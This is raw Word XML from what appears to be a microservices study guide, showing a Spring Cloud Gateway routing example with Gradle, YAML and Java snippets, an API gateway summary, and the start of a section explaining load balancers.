          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="007635D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spring Cloud Gateway Example (Java/Spring Boot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7B9B0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dd dependency in build.gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB33563" w14:textId="13DE8F3A"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117080"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">implementation </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'org.springframework.cloud:spring-cloud-starter-gateway'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2226F8D4"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Basic configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA9FBB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spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2B263B"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cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34664B20"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gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535CCC1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routes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0F44E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us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26D45AD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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BADD807"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174549EE"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5831EA94"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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> order</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0115A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uri</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> http</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//localhost:8082</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA91C28"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predicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D72F446" w14:textId="7328C209"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096018"/>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0066"/>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orders/</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452BB8FD" w14:textId="52C007AD"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Add filter (optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A03D5F"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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>@Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5F578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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RouteLocator</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> customRouteLocator</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RouteLocatorBuilder</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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AEA79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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> builder</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>routes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2260573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route</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"user-service"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> r </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> r</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"/users/**"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FEF9D9"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filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">f </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> f</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>addRequestHeader</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"X-Gateway"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"SpringCloud"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C3F95D"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uri</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"http://localhost:8081"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D421E1C" w14:textId="77777777"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1453F4" w14:textId="6568BD43" w:rsidR="00FC2EFF" w:rsidRPr="00FC2EFF" w:rsidRDefault="00FC2E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085759"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C47BF5" w14:textId="77777777" w:rsidR="007635D1" w:rsidRPr="007635D1" w:rsidRDefault="00000000" w:rsidP="008A18B1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="3F77AEBC">
          <v:rect id="_x0000_i3121" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D440F8" w14:textId="77777777" w:rsidR="007635D1" w:rsidRPr="007635D1" w:rsidRDefault="007635D1" w:rsidP="008A18B1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007635D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CD3133"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An API Gateway is critical in microservices architectures for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7819AC"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Managing APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E34531B" w14:textId="77777777" w:rsid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implifying client interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B8F493" w14:textId="7271436B" w:rsidR="007635D1" w:rsidRPr="00FC2EFF" w:rsidRDefault="007635D1" w:rsidP="008A18B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2EFF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Securing and scaling services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328B9B92" w14:textId="77777777" w:rsidR="007635D1" w:rsidRPr="007635D1" w:rsidRDefault="007635D1" w:rsidP="008A18B1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007635D1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It brings centralized control and flexibility to backend service exposure and is a foundational element in modern, distributed applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189D2EDF"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07D2F875">
          <v:rect id="_x0000_i3122" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2746F398" w14:textId="15F10781" w:rsidR="007635D1" w:rsidRPr="00CE4B95" w:rsidRDefault="008A18B1" w:rsidP="007635D1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="734" w:name="_Toc197867948"/>
      <w:r w:rsidRPr="008A18B1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Load balancer</w:t>
      </w:r>
      <w:r w:rsidR="007635D1" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="734"/>
    </w:p>
    <w:p w14:paraId="4DD3B52C" w14:textId="30808AD5" w:rsidR="0068580F" w:rsidRPr="0068580F" w:rsidRDefault="0068580F" w:rsidP="00EF3596">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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system component that automatically distributes incoming network traffic across multiple servers (or service instances) to ensure no single server becomes overwhelmed, ensuring </w:t>
      </w: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fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDA2CD4"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3299766">
          <v:rect id="_x0000_i3123" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F6A4A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Why Use a Load Balancer?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221824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mprove performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by balancing workload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1335018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w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>increase fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>—if one server fails, traffic is rerouted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7387647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enable </w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>horizontal scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>—add/remove servers without downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C250DD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o act as a </w:t>
      </w:r>
      <w:r w:rsidRPr="0068580F">
        <w:rPr>
